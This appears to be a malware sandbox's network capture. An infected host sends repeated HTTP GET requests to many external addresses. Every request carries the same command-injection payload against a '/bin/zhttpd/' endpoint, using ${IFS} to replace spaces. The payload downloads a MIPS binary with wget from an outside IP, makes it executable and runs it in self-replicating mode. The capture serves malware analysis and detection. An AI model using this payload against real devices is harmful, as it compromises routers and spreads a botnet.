                                                Jan 12, 2024 18:24:39.966638088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5482192.168.2.1349140160.87.164.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966720104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5483192.168.2.1357068118.223.247.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966759920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5484192.168.2.1357956170.220.174.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966809988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5485192.168.2.135656668.8.159.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966859102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5486192.168.2.1341514135.87.38.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966902971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5487192.168.2.1352064108.168.29.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966938019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5488192.168.2.1351158136.189.223.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967010975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5489192.168.2.1355384146.63.173.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967055082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5490192.168.2.13540325.39.172.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967082024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5491192.168.2.1351708161.122.220.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967147112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5492192.168.2.1359120184.69.126.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967185020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5493192.168.2.135979032.170.201.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967283010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5494192.168.2.134593269.124.123.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967334032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5495192.168.2.134891238.25.183.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967367887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5496192.168.2.1337112198.55.142.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967453003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5497192.168.2.134712660.77.238.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967500925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5498192.168.2.1358624182.41.63.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967544079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5499192.168.2.1347042117.252.144.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967612982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5500192.168.2.133493444.29.103.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967663050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5501192.168.2.1359710217.110.1.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967731953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5502192.168.2.1350004165.86.96.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967789888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5503192.168.2.1335046189.207.31.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967818022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5504192.168.2.1354354182.75.155.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967895031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5505192.168.2.1336820134.70.121.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967969894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5506192.168.2.135993693.213.68.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.967998981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5507192.168.2.1350680219.197.187.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968048096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5508192.168.2.135638439.28.176.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968107939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5509192.168.2.133388448.250.106.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968164921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5510192.168.2.134038276.141.24.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968200922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5511192.168.2.1347732145.108.188.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968240976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5512192.168.2.133882845.149.145.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968297005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5513192.168.2.1354492187.15.105.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968350887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5514192.168.2.1337398152.198.181.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968441963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5515192.168.2.135924087.90.43.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968488932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5516192.168.2.1335768155.8.163.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968569994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5517192.168.2.134670682.138.162.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968585014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5518192.168.2.135510876.61.41.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968637943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5519192.168.2.13455385.22.116.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968683958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5520192.168.2.1351782132.146.216.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968728065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5521192.168.2.133652412.185.106.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968771935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5522192.168.2.135524467.158.188.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968825102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5523192.168.2.1354466160.250.115.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968890905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5524192.168.2.1354098195.60.116.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.968940020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5525192.168.2.135161863.137.200.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969013929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5526192.168.2.1354190104.119.18.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969050884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5527192.168.2.133936412.217.114.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969094038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5528192.168.2.134331658.230.144.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969168901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5529192.168.2.1355500109.74.53.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969218969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5530192.168.2.1344100112.142.220.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969264984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5531192.168.2.133490061.134.67.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969316006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5532192.168.2.135771076.232.115.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969353914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5533192.168.2.1338858165.178.229.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969404936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5534192.168.2.134835042.237.241.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969427109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5535192.168.2.1353312188.108.179.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969542027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5536192.168.2.133557661.77.169.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969578981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5537192.168.2.134399039.48.255.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969604969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5538192.168.2.135828272.127.172.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969672918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5539192.168.2.1360694105.211.153.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969748974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5540192.168.2.135110648.118.102.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969789982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5541192.168.2.135427027.254.81.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969861984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5542192.168.2.1338330178.215.89.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969932079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5543192.168.2.1344490139.89.32.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.969976902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5544192.168.2.1334106179.84.106.205443
                                                TimestampBytes transferredDirectionData
